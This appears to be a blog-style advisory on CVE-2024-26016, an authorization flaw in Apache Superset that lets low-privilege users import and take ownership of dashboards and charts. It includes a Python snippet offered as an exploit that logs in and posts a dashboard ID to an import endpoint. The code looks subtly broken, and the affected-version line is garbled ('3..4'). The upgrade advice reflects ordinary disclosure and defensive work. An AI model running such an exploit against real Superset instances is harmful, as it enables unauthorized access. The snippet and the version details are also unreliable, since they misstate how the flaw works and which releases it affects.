CVE-2024-26016: Unauthorized Access to and Modification of Dashboard and Chart Metadata in Apache Superset

The CVE-2024-26016 vulnerability has been identified in Apache Superset, which is a widely used open-source, enterprise-ready data insights platform that allows users to create and manage visualizations, dashboards, and datasets. This vulnerability allows low-privilege authenticated users to import and gain ownership of dashboards or charts that they do not have authorized access to, and then modify the metadata of these objects. This post will provide details on the vulnerability, along with a code snippet that can be used as an exploit. We'll also provide links to the original references and details on how to fix the issue.

Exploit Details

The CVE-2024-26016 vulnerability affects the following versions of Apache Superset: before 3..4, and from 3.1. before 3.1.1. It is crucial to note that although this exploit allows unauthorized users to access and modify a dashboard or chart's metadata, they would still not be able to gain access to the analytical data of these charts and dashboards. This access is restricted and subject to validation based on data access privileges.

Now let's consider the following Python code snippet, which demonstrates this exploit in action

import requests

target_url = "https://targetsuperset.example.com/";
username = "low_priv_user"
password = "low_priv_password"

# Authenticate with the target Superset instance
authentication_payload = {"username": username, "password": password}
authentication_response = requests.post(target_url + "login/", data=authentication_payload)
session = requests.Session()
session.cookies = authentication_response.cookies

# Import a dashboard that the user does not have access to
import_payload = {"dashboard_id": 1234}  # Replace the dashboard_id with the ID of the dashboard you want to import
import_response = session.post(target_url + "dashboardimport/", data=import_payload)

if import_response.status_code == 200:
    print("Dashboard successfully imported. Unauthorized access to its metadata is achieved.")
else:
    print("Failed to import dashboard.")

In this exploit, we first authenticate with a target Superset instance using the credentials of a low-privilege user. We then use this low-privilege user session to perform a POST request to the "dashboardimport/" endpoint, attempting to import a dashboard the user is not authorized to access. If the operation is successful, it means we have unauthorized access to the dashboard's metadata.

Fixing the Issue

Users are advised to upgrade to Apache Superset version 3.1.1, which contains the fix for this vulnerability. You can do this by following the official documentation for upgrading your Superset installation, available at this URL: https://superset.apache.org/docs/installation/upgrading-superset

Conclusion

It is of utmost importance to ensure the security of your data and analytics platforms. By updating your Apache Superset instance to the latest fixed version, you can prevent unauthorized users from accessing and modifying dashboards or charts that they are not authorized to view. Stay vigilant and make sure that you regularly update your software to protect your sensitive information against potential exploits.

Timeline

Published on: 02/28/2024 12:15:47 UTC
Last modified on: 02/28/2024 15:15:09 UTC